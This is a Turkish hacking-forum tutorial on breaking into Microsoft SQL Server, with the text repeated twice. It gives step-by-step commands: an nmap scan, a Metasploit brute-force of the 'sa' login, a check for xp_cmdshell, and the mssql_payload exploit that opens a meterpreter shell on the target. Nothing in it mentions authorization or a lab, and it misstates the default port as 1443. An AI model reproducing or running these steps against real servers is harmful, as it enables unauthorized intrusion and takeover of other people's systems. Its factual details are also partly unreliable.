Merhabalar TürkHackTeam ailesi, bugün sizlere "Microsoft SQL Server'e Sızalım" konusunu göstereceğim. İlk öncelikle başlıklarımıza bakalım ve Microsoft SQL Server'ın ne olduğuna bir bakalım.
Konu Başlıkları
Microsoft SQL Server Nedir?
Microsoft SQL Server Neden Kullanılır?
XP_CMDSHELL NEDİR?
Microsoft SQL Server'a Sızalım
Microsoft SQL Server Nedir?
Bir websitenin veya bir yazılımın bilgilerinin depolandığı veritabanı sistemidir. MSSQL en çok kullanılan veritabanı tiplerindendir.
Microsoft SQL Server Neden Kullanılır?
MSSQL Windows makineler üzerinde .NET ve .ASP ile yazılmış web sitelerinin ve yazılımlarının veritabanı olarak kullanılır.
XP_CMDSHELL NEDİR?
SQL Server da cmd komut satırını kullanmamıza yarayan bir araçtır. Bu özellik ile cmd komut satırında yapabildiğimiz her şeyi yapabiliriz.
Bu kadar terimsel anlatım yeter bence
) Hadi işlemlerimize başlayalım.
Microsoft SQL Server'a Sızalım
Bir cihaz, Microsoft SQL Server 1443 portundan işlem yapmaktadır. Yani bizim için önemli yer burası olacak. Bir port taraması yaparak hedefimizin 1443 portu'nun açık olup olmadığına bakalım. Bu yöntemimiz de Brute yapacağız arkadaşlar o yüzden güzel bir wordlist belirleyiniz.
Bunun için
yazalım.
Taramamız gerçekleşti ve 1443 portu açık olduğu gözüküyor. Buradan işlem yapacağız.
Şimdi terminale msfconsole yazalım ve açıldıktan sonra
yazalım ve exploite giriş yapalım. Daha sonra ayarlarımızı görmek için
yazalım.
Şimdi ayarlarımızı girelim öncelikle port ayarımızı girelim bunun için
yazalım ve kullanıcı adı ve şifre dosyalarını tanımlamak için
ve
olarak yazalım ve exploiti başlatmak için
diyelim.
Gördüğünüz gibi Brute yöntemi yaptı ve giriş bilgilerini bizlere gösterdi. Kullanıcı adı sa şifre 1234.
sa : Server Administration(Sunucu Yöneticisi)
Şimdi şifreyi ve kullanıcı adını aldık. Bir de xp_cmdshell'in aktif olup olmadığına bakalım.
xp_cmdshell ne olduğundan bahsetmiştim üstte fakat neden bunu kullanalım ki buradan giriş yapılıyorsa diyorsanız cevabını vereyim. CMD ile yapabildiğimiz her şeyi yapabiliyoruz ve kullanım kolaylığı sağlıyor bizlere.
Şimdi sunucumuzda xp_cmdshell açık mı diye bakalım. Bunun için terminale
yazıyoruz ve çıkan ekrana
yazalım.
Sonra ayarları yapacağız bunu için ayarlara bakalım
yazalım, IP adresini ayarlamak için
olarak yazalım.
Şifreyi ayarlamak için
yazalım. (1234'ü brute yönteminden bulmuştuk.) Kullanıcı adı zaten sa olduğu için ellemedim.
exploit diyerek işlemi başlatalım.
Gördüğünüz gibi xp_cmdshell'imiz aktif. "xp_cmdshell" in açık olması demek karşı tarafta shell açabileceğiz demektir.
Shell açmak için terminale yine
yazıyoruz. Daha sonra
yazarak exploite giriş yapıyoruz.
Burada yine ayarlarız yapacağız öncelikle IP adresimizi ayarlayalım bunun için
olarak yazıyoruz ve şifreyi ayarlamak için
yazıyoruz.
exploit yazarak işlemimizi yapıyoruz.
meterpreter kısmına gelince shell yazarak shelli açıyoruz.
Gördüğünüz gibi sisteme giriş yaptık. Buradan istediğiniz işlemleri yapabilirsiniz.
Konum bu kadardı arkadaşlar başka bir konumda görüşmek üzere sağlıcakla...
Konu Başlıkları
Microsoft SQL Server Nedir?
Microsoft SQL Server Neden Kullanılır?
XP_CMDSHELL NEDİR?
Microsoft SQL Server'a Sızalım
Microsoft SQL Server Nedir?
Bir websitenin veya bir yazılımın bilgilerinin depolandığı veritabanı sistemidir. MSSQL en çok kullanılan veritabanı tiplerindendir.
Microsoft SQL Server Neden Kullanılır?
MSSQL Windows makineler üzerinde .NET ve .ASP ile yazılmış web sitelerinin ve yazılımlarının veritabanı olarak kullanılır.
XP_CMDSHELL NEDİR?
SQL Server da cmd komut satırını kullanmamıza yarayan bir araçtır. Bu özellik ile cmd komut satırında yapabildiğimiz her şeyi yapabiliriz.
Bu kadar terimsel anlatım yeter bence
) Hadi işlemlerimize başlayalım.
Microsoft SQL Server'a Sızalım
Bir cihaz, Microsoft SQL Server 1443 portundan işlem yapmaktadır. Yani bizim için önemli yer burası olacak. Bir port taraması yaparak hedefimizin 1443 portu'nun açık olup olmadığına bakalım. Bu yöntemimiz de Brute yapacağız arkadaşlar o yüzden güzel bir wordlist belirleyiniz.
Bunun için
Kod:
nmap -sS -sV IP_ADRESITaramamız gerçekleşti ve 1443 portu açık olduğu gözüküyor. Buradan işlem yapacağız.
Şimdi terminale msfconsole yazalım ve açıldıktan sonra
Kod:
use auxiliary/scanner/mssql/mssql_login
Kod:
show optionsŞimdi ayarlarımızı girelim öncelikle port ayarımızı girelim bunun için
Kod:
set RHOSTS IP_ADRESI
Kod:
set USER_FILE DOSYA_YOLU
Kod:
set PASS_FILE DOSYA_YOLU
Kod:
exploitGördüğünüz gibi Brute yöntemi yaptı ve giriş bilgilerini bizlere gösterdi. Kullanıcı adı sa şifre 1234.
sa : Server Administration(Sunucu Yöneticisi)
Şimdi şifreyi ve kullanıcı adını aldık. Bir de xp_cmdshell'in aktif olup olmadığına bakalım.
xp_cmdshell ne olduğundan bahsetmiştim üstte fakat neden bunu kullanalım ki buradan giriş yapılıyorsa diyorsanız cevabını vereyim. CMD ile yapabildiğimiz her şeyi yapabiliyoruz ve kullanım kolaylığı sağlıyor bizlere.
Şimdi sunucumuzda xp_cmdshell açık mı diye bakalım. Bunun için terminale
Kod:
msfconsole
Kod:
use auxiliary/admin/mssql/mssql_enumSonra ayarları yapacağız bunu için ayarlara bakalım
Kod:
show options
Kod:
set RHOST IP_ADRESIŞifreyi ayarlamak için
Kod:
set PASSWORD 1234exploit diyerek işlemi başlatalım.
Gördüğünüz gibi xp_cmdshell'imiz aktif. "xp_cmdshell" in açık olması demek karşı tarafta shell açabileceğiz demektir.
Shell açmak için terminale yine
Kod:
msfconsole
Kod:
use exploit/windows/mssql/mssql_payloadBurada yine ayarlarız yapacağız öncelikle IP adresimizi ayarlayalım bunun için
Kod:
set RHOSTS IP_ADRESI
Kod:
set PASSWORD Şifreexploit yazarak işlemimizi yapıyoruz.
meterpreter kısmına gelince shell yazarak shelli açıyoruz.
Gördüğünüz gibi sisteme giriş yaptık. Buradan istediğiniz işlemleri yapabilirsiniz.
Konum bu kadardı arkadaşlar başka bir konumda görüşmek üzere sağlıcakla...
